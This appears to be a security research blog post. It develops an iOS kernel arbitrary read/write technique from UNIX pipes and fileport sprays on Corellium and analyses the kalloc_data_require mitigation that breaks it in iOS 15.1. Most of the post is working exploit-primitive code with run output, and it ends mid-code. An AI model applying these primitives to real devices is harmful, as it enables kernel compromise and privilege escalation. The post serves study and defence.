Exploring UNIX pipes for iOS kernel exploit primitives, and introducing kalloc_data_require
Disclaimer: All technical explanations are to the best of my knowledge and subject to human fallibility. Concepts may be overly simplified intentionally or otherwise.
While playing with Corellium to practice developing exploits with previously-patched bugs, I started to think about how Corellium's hypervisor magic could be used to practice on generalized techniques even without an underlying vulnerability. A particular paragraph by Brandon Azad inspired the concept:
"Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately."
In the browser world, a typical exploit strategy would take two ArrayBuffer objects and point the backing store pointer from one at the other, such that arrayBuffer1 can change arrayBuffer2->backing_store_pointer arbitrarily and safely, such as in this example from my Tesla Browser exploit:
The important part of the above diagram is the green box, corresponding to arrayBuffer1, and its backing store pointer containing the address of arrayBuffer2 (the standalone gray box on the right). By indexing into arrayBuffer1, fields within arrayBuffer2 can be modified, especially arrayBuffer2->backing_store_pointer.
Indexing into arrayBuffer2 will now read/write the desired arbitrary address.
The iOS kernel, having a BSD component, contains an obvious equivalent: UNIX pipes. The pipe APIs are used much like files in typical UNIX fashion, but rather than being backed by a file on disk, their contents are stored in the kernel's address space in the form of a "pipe buffer", which is a separate allocation (by default 512 bytes, but can be expanded by writing more data to the pipe). Controlling the pipe buffer pointer creates arbitrary read/write primitives in the same way as controlling an ArrayBuffer's backing store pointer in a JavaScript engine.
For example, this snippet will create a pipe, which is represented as a pair of file descriptors (one "read end" and one "write end"), and then write 32 bytes of A:
int pipe_pairs[2] = {0};
if (pipe(pipe_pairs)) {
    fprintf(stderr, "[!] Failed to create pipe: %s\n", strerror(errno));
    exit(-1);
}
printf("Pipe read end fd: %d\n", pipe_pairs[0]);
printf("Pipe write end fd: %d\n", pipe_pairs[1]);
char pipe_buf_contents[32];
memset(pipe_buf_contents, 0x41, sizeof(pipe_buf_contents));
write(pipe_pairs[1], &pipe_buf_contents, sizeof(pipe_buf_contents));
char buf[33] = {0};
read(pipe_pairs[0], &buf, 32);
printf("Read from pipe: %s\n", buf);
This creates at least two kernel allocations: a struct pipe and the pipe buffer itself. To build out the technique, we first need a simulated vulnerability.
Corellium is Magic
Corellium has a very neat feature that allows userland code to arbitrarily read/write kernel memory. While this will be perfectly reliable, for the sake of argument we'll pretend that there's a chance of failure leading to a kernel panic. Thus, the whole point of the pipe technique is to "promote" from unreliable primitives to better primitives. Our example primitives will be an arbitrary read of 0x20 bytes (randomly chosen) and an arbitrary 64-bit write^1:
/* Simulate a 0x20 byte read from an arbitrary kernel address, representative of a primitive from a bug.
 * Caller is responsible for freeing the buffer.
 */
static char *corellium_read(uint64_t kaddr_to_read) {
    char *leak = calloc(1, 128);
    unicopy(UNICOPY_DST_USER|UNICOPY_SRC_KERN, (uintptr_t)leak, kaddr_to_read, 0x20);
    return leak;
}

/* Simulate a 64-bit arbitrary write */
static void corellium_write64(uintptr_t kaddr, uint64_t val) {
    uint64_t value = val;
    unicopy(UNICOPY_DST_KERN|UNICOPY_SRC_USER, kaddr, (uintptr_t)&value, sizeof(value));
}
For additional realism we could add a random chance of failure, for example 10% chance of causing a kernel panic for each usage, or increasing the probability of failure each time. For the purpose of building out the technique I decided to keep it at 100% reliable, however.
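As a rough illustration of that failure model, the sketch below wraps a read primitive with a fixed per-use failure chance. Everything here is hypothetical: `struct flaky_primitive`, `flaky_should_fail`, and `flaky_read` are names invented for this example, and the "kernel" is a plain userland buffer rather than Corellium's unicopy, so the code can run anywhere.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical failure model: each use of the primitive fails with a fixed
 * percentage chance. On a real target a failure would be a kernel panic;
 * here it is only reported to the caller. */
struct flaky_primitive {
    unsigned fail_percent;  /* 0..100 */
    unsigned uses;          /* number of attempts so far */
    unsigned failures;      /* number of attempts that "panicked" */
};

/* Decide whether this use of the primitive fails. */
static int flaky_should_fail(struct flaky_primitive *p) {
    assert(p->fail_percent <= 100);
    p->uses++;
    if ((unsigned)(rand() % 100) < p->fail_percent) {
        p->failures++;
        return 1;
    }
    return 0;
}

/* Stand-in for a 0x20-byte arbitrary read: copies from a fake "kernel"
 * buffer. Returns 0 on success, -1 if the simulated primitive failed. */
static int flaky_read(struct flaky_primitive *p, const uint8_t *fake_kmem,
                      size_t offset, uint8_t out[0x20]) {
    if (flaky_should_fail(p)) {
        return -1;
    }
    memcpy(out, fake_kmem + offset, 0x20);
    return 0;
}
```

Counting uses alongside failures makes it easy to compare strategies by how many times they touch the unreliable primitive, which is the cost the pipe technique tries to minimize.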
Importantly, these primitives don't provide a KASLR^2 leak, so part of the development process will be working around that weakness. Corellium does have another magic hvc call that gives the kernel base address, but I chose not to use it.
Building up the pipe primitives
To start, we need two pipes, with allocated buffers. This is very similar to the basic pipe example above:
// Create two pipes
int pipe_pairs[4] = {0};
for (int i = 0; i < 4; i += 2) {
    if (pipe(&pipe_pairs[i])) {
        fprintf(stderr, "[!] Failed to create pipe: %s\n", strerror(errno));
        exit(-1);
    }
}
char pipe_buf_contents[64];
memset(pipe_buf_contents, 0x41, sizeof(pipe_buf_contents));
write(pipe_pairs[1], &pipe_buf_contents, sizeof(pipe_buf_contents));
memset(pipe_buf_contents, 0x42, sizeof(pipe_buf_contents));
write(pipe_pairs[3], &pipe_buf_contents, sizeof(pipe_buf_contents));
Now we need to locate these structures in kernel memory. One approach would be to use the arbitrary read to walk the struct proc linked list to find the exploit process, then walk its p_fd->fd_ofiles array to find the pipe's fileglob, and finally read fileglob->fg_data, which will be a struct pipe. Unfortunately, that requires many reads, and we're pretending that the read primitive is unreliable. It also requires knowing the KASLR slide in order to find the head of the struct proc list. We need a different approach.
Fileports: The Reese's Peanut Butter Cup of XNU
There's an API for sharing a UNIX file descriptor via Mach ports, and spraying Mach ports has been a common technique for quite some time. The fileport creation API is very simple:
int pipe_read_fd = [...]; // Assume this was created elsewhere
mach_port_t my_fileport = MACH_PORT_NULL;
kern_return_t kr = fileport_makeport(pipe_read_fd, &my_fileport);
By making a huge number of these (say, 100k), the odds of one of the Mach ports landing at a predictable address are quite high. The port's kobject field points to the pipe's fileglob object. This contains two very useful fields:
- fg_ops: a pointer to an array of function pointers. This is how the kernel knows to call pipe_read rather than vn_read (used for regular files on disk). This pointer is within the kernel's __DATA_CONST section, which means that it's a KASLR leak!
- fg_data: a pointer to the struct pipe, which is what we wanted in the first place.
The struct pipe then contains an embedded structure (struct pipebuf) which holds the address of the pipe buffer^3. With two uses of the arbitrary read, we can identify the address of a struct pipe. For our purposes, we have to do it again to locate pipe2, so a total of four uses of the arbitrary read. But how do we figure out which kernel address to guess?
More Corellium magic: Hypervisor Hooks
Rather than wildly guessing, we can use hypervisor hooks to output the address of each fileport allocation, and then pick one that shows up in multiple runs.
The hooks are placed via a debugger command, but run independently of the debugger after that. Consequently, they run much faster than breakpoints, and can log directly to the device's virtual console, which will make it easy to extract the data for later analysis.
Our hook will be about as trivial as possible: Simply print the value of a register when a particular address is executed. This is performed with a limited C-like syntax in the form of a one-liner:
(lldb) process plugin packet monitor patch 0xFFFFFFF00756F4F8 print_int("Fileport allocated", cpu.x[0]); print("\n");
process plugin packet monitor is lldb's overly verbose syntax for sending raw "monitor" commands^4 to the remote debugger stub. The hooks documentation says that these commands are "generally not available" with lldb, but at least this basic hook seems to work.
The rest of the command hooks the desired address and prints the contents of the X0 register to the device's console. Fortunately, the output of hooks is displayed in a different text color, so it's easy to spot.
To prepare the hook, we need to identify an address to patch where the address of the new allocation will be in a register. Looking at the implementation of fileport_makeport:
int
sys_fileport_makeport(proc_t p, struct fileport_makeport_args *uap, __unused int *retval)
{
    int err;
    int fd = uap->fd; // [1]
    user_addr_t user_portaddr = uap->portnamep;
    struct fileproc *fp = FILEPROC_NULL;
    struct fileglob *fg = NULL;
    ipc_port_t fileport;
    mach_port_name_t name = MACH_PORT_NULL;
    [...]
    err = fp_lookup(p, fd, &fp, 1); // [2]
    if (err != 0) {
        goto out_unlock;
    }
    fg = fp->fp_glob; // [3]
    if (!fg_sendable(fg)) {
        err = EINVAL;
        goto out_unlock;
    }
    [...]
    /* Allocate and initialize a port */
    fileport = fileport_alloc(fg); // [4]
    if (fileport == IPC_PORT_NULL) {
        fg_drop_live(fg);
        err = EAGAIN;
        goto out;
    }
    [...]
}
At mark #1, the file descriptor is received from the arguments structure, and will match the same integer representation of the pipe's fd as seen in userspace.
Mark #2 performs the translation of the fd (e.g. 3) to a pointer to the fileproc object representing the pipe in the kernel's memory. Then at mark #3, the fp_glob pointer is dereferenced, retrieving the fileglob for the pipe.
Mark #4 creates the Mach port, which wraps the fileglob object, placing its pointer in the kobject field. fileport is the address we want to log, and it's the return value from fileport_alloc, so it'll be in the X0 register. Let's take a look at fileport_alloc:
ipc_port_t
fileport_alloc(struct fileglob *fg)
{
    return ipc_kobject_alloc_port((ipc_kobject_t)fg, IKOT_FILEPORT,
        IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST);
}
This function is short and only referenced once, so it'll likely be inlined. Now that we know the lay of the land, we need to find the equivalent code inside the kernelcache. Fortunately, jtool2 can help with that. After downloading the kernelcache from the Corellium web interface's "Connect" tab, jtool2's analyze feature can be used to create a symbol cache file:
$ jtool2 --analyze kernel-iPhone9,1-18F72
Analyzing kernelcache..
This is an old-style A10 kernelcache (Darwin Kernel Version 20.5.0: Sat May 8 02:21:50 PDT 2021; root:xnu-7195.122.1~4/RELEASE_ARM64_T8010)
Warning: This version of joker supports up to Darwin Version 19 - and reported version is 20
-- Processing __TEXT_EXEC.__text..
Disassembling 6655836 bytes from address 0xfffffff007154000 (offset 0x15001c):
__ZN11OSMetaClassC2EPKcPKS_j is 0xfffffff0076902f8 (OSMetaClass)
Can't get IOKit Object @0x0 (0xfffffff007690b5c)
[...]
opened companion file ./kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB
Dumping symbol cache to file
Symbolicated 7298 symbols and 9657 functions
And then that file can be grepped to find the two symbols we need:
$ grep ipc_kobject_alloc_port kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB
0xfffffff00719de7c|_ipc_kobject_alloc_port|
$ grep fileport_makeport kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB
0xfffffff00756f3a4|_fileport_makeport|
Now we simply locate the call to ipc_kobject_alloc_port from within fileport_makeport:
The instruction after the call is the one to hook, so 0xFFFFFFF00756F4F8 (unslid). Since KASLR is enabled, patching this address directly won't work^5. Fortunately, as previously mentioned there's yet another bit of hypervisor magic: a way to obtain the slid kernel base from userspace by calling their provided get_kernel_addr function:
#define KERNEL_BASE 0xFFFFFFF007004000
uint64_t kslide = get_kernel_addr(0) - KERNEL_BASE;
printf("Kernel slide: 0x%llx\n", kslide);
printf("Place hypervisor hook:\n");
uint64_t patch_address = g_kparams->fileport_allocation_kaddr+kslide;
printf("\tprocess plugin packet monitor patch 0x%llx print_int(\"Fileport allocated\", cpu.x[0]); print(\"\\n\");\n", patch_address);
printf("Press enter to continue\n");
getchar();
By placing this snippet at the beginning of the exploit, it provides a moment to get the debugger attached and install the hook, providing the correct slid address for the given kernelcache.
Once the hook is in place, we perform the spray of 100k fileports and select an allocation to use as the guess going forward. I simply scrolled up a bit and picked one at random about 3/4 of the way down the list, and that seems to work well enough for a proof of concept. A more serious implementation would track ranges over multiple runs and try to pick an address with a known high probability of landing the spray, such as in Justin Sherman's IOMobileFrameBuffer exploit.
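A minimal sketch of that multi-run selection might look like the following. It assumes the hook output from each run has already been parsed into an array of addresses; `struct run_sample`, `run_contains`, and `pick_best_guess` are hypothetical names for this example and are not part of the published exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Addresses logged by the hypervisor hook during one run of the spray. */
struct run_sample {
    const uint64_t *addrs;
    size_t count;
};

/* Returns 1 if addr was logged during the given run, 0 otherwise. */
static int run_contains(const struct run_sample *run, uint64_t addr) {
    for (size_t i = 0; i < run->count; i++) {
        if (run->addrs[i] == addr) {
            return 1;
        }
    }
    return 0;
}

/* Pick the address from the first run that reappears in the most runs.
 * Ties go to the earliest candidate. The number of runs containing the
 * winner is written to *hits_out when it is non-NULL. This is a linear
 * scan per candidate; a sorted array or hash set would be preferable
 * for a full 100k-entry sample. */
static uint64_t pick_best_guess(const struct run_sample *runs, size_t nruns,
                                size_t *hits_out) {
    assert(nruns > 0 && runs[0].count > 0);
    uint64_t best = 0;
    size_t best_hits = 0;
    for (size_t i = 0; i < runs[0].count; i++) {
        uint64_t cand = runs[0].addrs[i];
        size_t hits = 0;
        for (size_t r = 0; r < nruns; r++) {
            hits += (size_t)run_contains(&runs[r], cand);
        }
        if (hits > best_hits) {
            best = cand;
            best_hits = hits;
        }
    }
    if (hits_out) {
        *hits_out = best_hits;
    }
    return best;
}
```

Dividing the hit count by the number of runs gives a crude estimate of how often the guess would land, which is the figure that matters when every failed guess costs a use of the unreliable read.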
Now that we have a guess, we can perform the same spray twice (once per pipe read-end fd) and read the kobject field to locate the struct pipe. Here's the full implementation:
struct kpipe {
    int rfd;
    int wfd;
    uint64_t fg_ops;
    uint64_t r_fg_data;
};

static struct kpipe *find_pipe(int rfd, int wfd) {
    struct kpipe *kp = NULL;
    char *leak = NULL;
    char *fileglob = NULL;
    char *fg_data = NULL;
    printf("[*] Spraying fileports\n");
    mach_port_t fileports[NUM_FILEPORTS] = {0};
    for (int i = 0; i < NUM_FILEPORTS; i++) {
        kern_return_t kr = fileport_makeport(rfd, &fileports[i]);
        CHECK_KR(kr);
    }
    printf("[*] Done spraying fileports\n");
#ifdef SAMPLE_MEMORY
    // No need to continue, just exit
    printf("[*] Finished creating memory sample, exiting\n");
    exit(0);
#endif
    uint64_t kaddr_to_read = g_kparams->fileport_kaddr_guess;
    leak = read_kernel_data(kaddr_to_read+g_kparams->kobject_offset); // port->kobject, should point to a struct fileglob
    if (!leak) {
        printf("[!] Failed to read kernel data, will likely panic soon\n");
        goto out;
    }
    uint64_t pipe_fileglob_kaddr = *(uint64_t *)leak;
    if ((pipe_fileglob_kaddr & 0xff00000000000000) != 0xff00000000000000) {
        printf("[!] Failed to land the fileport spray\n");
        goto out;
    }
    pipe_fileglob_kaddr |= 0xffffff8000000000; // Pointer might be PAC'd
    printf("[*] Found pipe structure: 0x%llx\n", pipe_fileglob_kaddr);
    // +0x28 points to fg_ops to leak the KASLR slide
    // +0x38 points to fg_data (struct pipe)
    fileglob = read_kernel_data(pipe_fileglob_kaddr+0x28);
    if (!fileglob) {
        printf("[!] Failed to read kernel data, will likely panic soon\n");
        goto out;
    }
    kp = calloc(1, sizeof(struct kpipe));
    kp->rfd = rfd;
    kp->wfd = wfd;
    kp->fg_ops = *(uint64_t *)fileglob;
    kp->r_fg_data = *(uint64_t *)(fileglob+0x10);
    printf("[*] pipe fg_ops: 0x%llx\n", kp->fg_ops);
    printf("[*] pipe r_fg_data: 0x%llx\n", kp->r_fg_data);
out:
    for (int i = 0; i < NUM_FILEPORTS; i++) {
        kern_return_t kr = mach_port_destroy(mach_task_self(), fileports[i]);
        CHECK_KR(kr);
    }
#define FREE(m) free(m); m = NULL;
    FREE(leak);
    FREE(fileglob);
    FREE(fg_data);
#undef FREE
    return kp;
}
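The fg_ops value read here is what yields the KASLR slide: subtracting the unslid address of the pipe ops table (taken from the kernelcache) from the leaked pointer gives the slide. The helper below is a sketch of that arithmetic; `kslide_from_fg_ops` is a hypothetical name, and the 16 KB alignment check is an assumption used only as a sanity test on the result.

```c
#include <assert.h>
#include <stdint.h>

/* Derive the KASLR slide from a leaked fg_ops pointer and the unslid
 * address of the pipe ops table from the kernelcache. Returns 0 on
 * success, -1 if the leak does not look like a slid pointer to that table. */
static int kslide_from_fg_ops(uint64_t leaked_fg_ops, uint64_t unslid_pipe_ops,
                              uint64_t *kslide_out) {
    assert(kslide_out);
    if (leaked_fg_ops < unslid_pipe_ops) {
        return -1;
    }
    uint64_t slide = leaked_fg_ops - unslid_pipe_ops;
    /* Assumption: the slide is a multiple of the 16 KB page size. */
    if (slide & 0x3fff) {
        return -1;
    }
    *kslide_out = slide;
    return 0;
}
```

With the iOS 14.6 values that appear in the run output and parameter table later in this post, a leaked fg_ops of 0xfffffff00acd9640 and an unslid pipe ops address of 0xfffffff00712d640 give a slide of 0x3bac000, which matches the "KASLR slide" line printed by the exploit.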
Plumbing the pipes together
Now that we know where our pipes are, we can simply write a single 64-bit value and have a reliable method of arbitrary read/write! struct pipe contains an embedded structure, struct pipebuf, which contains all of the fields we care about:
struct pipebuf {
    u_int cnt;  /* number of chars currently in buffer */
    u_int in;   /* in pointer */
    u_int out;  /* out pointer */
    u_int size; /* size of buffer */
#if KERNEL
    caddr_t OS_PTRAUTH_SIGNED_PTR("pipe.buffer") buffer; /* kva of buffer */
#else
    caddr_t buffer; /* kva of buffer */
#endif /* KERNEL */
};
The in and out fields are used as cursors to keep track of the current offsets for write and read operations on a pipebuf, and the buffer field points to the kernel memory containing the pipe's data. The next step is very simple: just set pipe1's buffer address (offset +0x10 from the struct pipe) to the address of pipe2's struct pipe:
ctx->pipe1 = find_pipe(pipe_pairs[0], pipe_pairs[1]);
[...]
ctx->pipe2 = find_pipe(pipe_pairs[2], pipe_pairs[3]);
[...]
// Set pipe1's buffer to point to pipe2's fg_data
printf("[*] Setting pipe1->buffer (0x%llx) to pipe2's fg_data (0x%llx)...\n", (ctx->pipe1->r_fg_data+0x10), ctx->pipe2->r_fg_data);
kwrite64(ctx->pipe1->r_fg_data+0x10, ctx->pipe2->r_fg_data);
And now by reading from and writing to pipe1, we can control the buffer pointer and in/out fields of pipe2 reliably and safely:
int pipe_kread(uint64_t kaddr, void *buf, size_t len) {
    assert(g_pipe_rw_ctx);
    struct pipe_rw_context *ctx = g_pipe_rw_ctx;
    read(ctx->pipe1->rfd, &ctx->prw, sizeof(ctx->prw));
    ctx->prw.cnt = len;
    ctx->prw.size = len;
    ctx->prw.buffer = kaddr;
    ctx->prw.in = 0;
    ctx->prw.out = 0;
    write(ctx->pipe1->wfd, &ctx->prw, sizeof(ctx->prw));
    return read(ctx->pipe2->rfd, buf, len);
}
Where prw is a structure matching the layout of struct pipebuf:
struct pipe_rw {
    u_int cnt;
    u_int in;
    u_int out;
    u_int size;
    uint64_t buffer;
};
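Since the whole technique depends on this userland structure lining up with the kernel's struct pipebuf, it can be worth pinning the layout down at compile time. The sketch below restates the structure with plain unsigned int in place of u_int for portability, and relies on struct pipebuf being the first member of struct pipe, which is what the +0x10 offset used earlier implies. `pipe_buffer_field_kaddr` is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userland mirror of struct pipebuf on a 64-bit target. */
struct pipe_rw {
    unsigned int cnt;
    unsigned int in;
    unsigned int out;
    unsigned int size;
    uint64_t buffer;
};

/* Four 32-bit fields precede the pointer, so it must sit at +0x10. */
_Static_assert(offsetof(struct pipe_rw, buffer) == 0x10,
               "buffer pointer expected at offset 0x10");
_Static_assert(sizeof(struct pipe_rw) == 0x18,
               "pipe_rw expected to be 0x18 bytes");

/* Kernel address of the buffer pointer inside a struct pipe, assuming the
 * embedded pipebuf is the first member of struct pipe. */
static uint64_t pipe_buffer_field_kaddr(uint64_t pipe_kaddr) {
    return pipe_kaddr + offsetof(struct pipe_rw, buffer);
}
```

For the struct pipe at 0xffffffe19bc3c9e8 from the iOS 14.6 run, this yields 0xffffffe19bc3c9f8, the same address the exploit prints when it redirects pipe1's buffer.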
And then the write primitive works similarly:
int pipe_kwrite(uint64_t kaddr, void *buf, size_t len) {
    assert(g_pipe_rw_ctx);
    struct pipe_rw_context *ctx = g_pipe_rw_ctx;
    read(ctx->pipe1->rfd, &ctx->prw, sizeof(ctx->prw));
    if (len < 0x200) {
        ctx->prw.size = 0x200; // Original value, this works, but what if we write more than 0x200 bytes?
    } else if (len < 0x4000) {
        ctx->prw.size = 0x4000;
    } else {
        errx(EXIT_FAILURE, "[!] Writes of size >=0x4000 are not supported!\n");
    }
    ctx->prw.cnt = len;
    ctx->prw.buffer = kaddr;
    ctx->prw.in = 0;
    ctx->prw.out = 0;
    write(ctx->pipe1->wfd, &ctx->prw, sizeof(ctx->prw));
    return write(ctx->pipe2->wfd, buf, len);
}
Now that the new primitives are set up, we can test them out by reading and writing some known values, for example the version string^6 and a sysctl that has been used in the past for flagging previous exploitation:
// Example of arbitrary read
printf("[*] Beginning arbitrary read of kernel version string...\n");
char version[128] = {0};
pipe_kread(g_kparams->version_string_kaddr+g_pipe_rw_ctx->kslide, &version, sizeof(version));
hexdump(version, sizeof(version));
// Example of arbitrary write
printf("[*] Beginning arbitrary write of kern.maxfilesperproc...\n");
pipe_kwrite32(g_kparams->maxfilesperproc_kaddr+g_pipe_rw_ctx->kslide, 0x41414141);
int maxfilesperproc = 0;
size_t sysctl_size = sizeof(int);
if (sysctlbyname("kern.maxfilesperproc", &maxfilesperproc, &sysctl_size, NULL, 0)) {
    errx(EXIT_FAILURE, "sysctlbyname: %s\n", strerror(errno));
}
printf("[*] kern.maxfilesperproc: %d (0x%x)\n", maxfilesperproc, maxfilesperproc);
Putting it all together and running the exploit looks like this:
sh-5.0# /tmp/pipe_rw
[*] Detected iPhone9,1/18F72 (14.6)
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe19bcc3540
[*] pipe fg_ops: 0xfffffff00acd9640
[*] pipe r_fg_data: 0xffffffe19bc3c9e8
[*] KASLR slide: 0x3bac000
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe19d0eb7e0
[*] pipe fg_ops: 0xfffffff00acd9640
[*] pipe r_fg_data: 0xffffffe19bc3cb50
[*] Setting pipe1->buffer (0xffffffe19bc3c9f8) to pipe2's fg_data (0xffffffe19bc3cb50)...
[*] Beginning arbitrary read of kernel version string...
0x000000: 44 61 72 77 69 6e 20 4b 65 72 6e 65 6c 20 56 65 Darwin Kernel Ve
0x000010: 72 73 69 6f 6e 20 32 30 2e 35 2e 30 3a 20 53 61 rsion 20.5.0: Sa
0x000020: 74 20 4d 61 79 20 20 38 20 30 32 3a 32 31 3a 35 t May 8 02:21:5
0x000030: 30 20 50 44 54 20 32 30 32 31 3b 20 72 6f 6f 74 0 PDT 2021; root
0x000040: 3a 78 6e 75 2d 37 31 39 35 2e 31 32 32 2e 31 7e :xnu-7195.122.1~
0x000050: 34 2f 52 45 4c 45 41 53 45 5f 41 52 4d 36 34 5f 4/RELEASE_ARM64_
0x000060: 54 38 30 31 30 00 00 00 00 14 00 00 00 05 00 00 T8010...........
0x000070: 00 00 00 00 00 80 00 00 00 00 00 00 00 30 00 72 .............0.r
[*] Beginning arbitrary write of kern.maxfilesperproc...
[*] kern.maxfilesperproc: 1094795585 (0x41414141)
Done, entering infinite loop, will panic on termination
Note that when the pipe file descriptors are closed (which happens automatically when the process terminates), the kernel will panic. This is because it will try to free the pipe buffer, which for pipe2 will point to wherever was last read/written, and for pipe1 will point to pipe2. This creates a chicken-and-egg scenario, as the pipes can't be used to fix themselves up before being closed. For testing purposes, I opted to simply hang forever.
At this point a full proof-of-concept would go through the standard procedure of escalating privileges and unsandboxing.
Testing on iOS 15.1
We'd like the technique to be generalized and work on newer versions of iOS as well, so the next step is to create a virtual iPhone 7 with iOS 15.1 and find the parts that are different. Of course static kernel addresses like the fg_ops field on a pipe and the kernel version string will be different, and likely the guessed kernel address for the spray will change. After performing the same steps of examining the kernelcache and sampling the fileports spray, here are the two sets of parameters together, first from iOS 14.6 and then from 15.1 (both on iPhone 7):
static struct kernel_params iPhone7_18F72 = {
    .kobject_offset = 0x68,
    .pipe_ops_kaddr = 0xfffffff00712d640,
    .version_string_kaddr = 0xFFFFFFF00703BB17,
    .maxfilesperproc_kaddr = 0xfffffff0077d07f0,
    .fileport_kaddr_guess = 0xffffffe19debc540,
    .fileport_allocation_kaddr = 0xFFFFFFF00756F4F8,
};
static struct kernel_params iPhone7_19B74 = {
    .kobject_offset = 0x58,
    .pipe_ops_kaddr = 0xFFFFFFF007143AC8,
    .version_string_kaddr = 0xFFFFFFF00703BCBE,
    .maxfilesperproc_kaddr = 0xFFFFFFF007834AE8,
    .fileport_kaddr_guess = 0xffffffe0f7678820,
    .fileport_allocation_kaddr = 0xFFFFFFF0075A8EF4,
};
The only unexpected change was the kobject offset within the Mach port object. In theory, with all of this filled in the technique should "just work."
Well, almost:
sh-5.0# /tmp/pipe_rw
[*] Detected iPhone9,1/19B74 (15.1)
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe0f6b7c600
[*] pipe fg_ops: 0xfffffff01a677ac8
[*] pipe r_fg_data: 0xffffffe0f46b09e8
[*] KASLR slide: 0x13534000
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe0f6b7c720
[*] pipe fg_ops: 0xfffffff01a677ac8
[*] pipe r_fg_data: 0xffffffe0f46b0b50
[*] Setting pipe1->buffer (0xffffffe0f46b09f8) to pipe2's fg_data (0xffffffe0f46b0b50)...
[*] Beginning arbitrary read of kernel version string...
[...]
panic(cpu 0 caller 0xfffffff01ad357c4): kalloc_data_require failed: address 0xffffffe0f46b0b50 in [pipe zone] @kalloc.c:1776
[...]
This appears to be a new, albeit small, mitigation specifically designed to counter this technique!
Opening up the kernelcache in a disassembler and finding the panic call by cross-referencing the string, it appears that this is only used within pipe_read and pipe_write. This appears to be conceptually similar to zone_require, integrating an element of kheaps. Essentially, pipe buffers under normal circumstances should only contain "data", or blobs that have no particular meaning to the kernel.
The decompilation is relatively straightforward (it is not entirely accurate, but it's sufficient for a high-level understanding): the function looks up the relevant page in the zone metadata and checks a flag that indicates whether the allocation is from a KHEAP_DATA_BUFFERS zone.
void __fastcall kalloc_data_require(unsigned __int64 kaddr, unsigned __int64 size)
{
__int64 zone_index; // x8
unsigned __int16 *v3; // x8
if ( kaddr + size
|| (zone_index = *(_WORD *)(16LL * (unsigned int)(kaddr >> 14)) & 0x7FF, (zone_security_array[zone_index] & 6) != 4)
|| ((_DWORD)zone_index != 3 ? (v3 = (unsigned __int16 *)&qword_FFFFFFF0078510A8[21 * zone_index + 6] + 3) : (v3 = (unsigned __int16 *)&unk_FFFFFFF0070FE812),
*v3 < size) )
{
kalloc_data_require_panic(kaddr, size);
}
}
void __fastcall __noreturn kalloc_data_require_panic(unsigned __int64 kaddr, __int64 size)
{
__int64 zone_index; // x8
const char *v3; // x9
const char *v4; // x10
unsigned __int16 *zone_allocation_size; // x8
if ( kaddr + size )
panic(
"kalloc_data_require failed: address %p not in zone native map @%s:%d",
(const void *)kaddr,
"kalloc.c",
1785LL);
zone_index = *(_WORD *)(16LL * (unsigned int)(kaddr >> 14)) & 0x7FF;
if ( (unsigned int)zone_index < 0x28A )
{
v3 = (const char *)*((_QWORD *)&off_FFFFFFF0070FAD38
+ (((unsigned __int64)(unsigned __int8)zone_security_array[zone_index] >> 1) & 3));
v4 = (const char *)qword_FFFFFFF0078510A8[21 * zone_index + 2];
if ( (zone_security_array[zone_index] & 6) == 4 )
{
if ( (_DWORD)zone_index == 3 )
zone_allocation_size = (unsigned __int16 *)&unk_FFFFFFF0070FE812;
else
zone_allocation_size = (unsigned __int16 *)&qword_FFFFFFF0078510A8[21 * zone_index + 6] + 3;
panic(
"kalloc_data_require failed: address %p in [%s%s], size too large %zd > %zd @%s:%d",
(const void *)kaddr,
v3,
v4,
size,
*zone_allocation_size,
"kalloc.c",
1782LL);
}
panic("kalloc_data_require failed: address %p in [%s%s] @%s:%d", (const void *)kaddr, v3, v4, "kalloc.c", 1776LL);
}
panic_zone_is_outside_zone_array(&qword_FFFFFFF0078510A8[21 * zone_index]);
}
For more accuracy, here's the disassembly^7 with some notes:
In earlier versions of XNU, pipe buffers would be allocated by kalloc:
static int
pipespace(struct pipe *cpipe, int size)
{
    vm_offset_t buffer;
    if (size <= 0) {
        return EINVAL;
    }
    if ((buffer = (vm_offset_t)kalloc(size)) == 0) {
        return ENOMEM;
    }
    /* free old resources if we're resizing */
    pipe_free_kmem(cpipe);
    cpipe->pipe_buffer.buffer = (caddr_t)buffer;
    cpipe->pipe_buffer.size = size;
    cpipe->pipe_buffer.in = 0;
    cpipe->pipe_buffer.out = 0;
    cpipe->pipe_buffer.cnt = 0;
    OSAddAtomic(1, &amountpipes);
    OSAddAtomic(cpipe->pipe_buffer.size, &amountpipekva);
    return 0;
}
This would result in an allocation in one of the kalloc zones rounded up from the size of the initial write. In iOS 14.x, this changed to allocating from the KHEAP_DATA_BUFFERS submap:
static int
pipespace(struct pipe *cpipe, int size)
{
    [...]
    buffer = (vm_offset_t)kheap_alloc(KHEAP_DATA_BUFFERS, size, Z_WAITOK);
    if (!buffer) {
        return ENOMEM;
    }
    [...]
}
By itself, this only prevents pipe buffers from being used to build fake objects (e.g. as the replacer object for use-after-free), because most interesting objects would be allocated from the KHEAP_DEFAULT/KHEAP_KEXT submaps, or from a dedicated zone.
This new call to kalloc_data_require expands on this to enforce that the pipe buffer must be allocated from KHEAP_DATA_BUFFERS. This breaks the technique of pointing one pipe at another because the dedicated pipe zone is definitely not in KHEAP_DATA_BUFFERS.
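To make the effect concrete, here is a deliberately simplified userland model of the check, not the kernel's implementation. It leaves out the "address is in the zone native map" test and the zone metadata lookup, and every name in it (`enum heap_class`, `struct zone_model`, `data_require_ok`, the zone names and sizes) is illustrative only.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-ins for the heaps an allocation can come from. */
enum heap_class {
    HEAP_DEFAULT,
    HEAP_KEXT,
    HEAP_DATA_BUFFERS,
    HEAP_DEDICATED_ZONE
};

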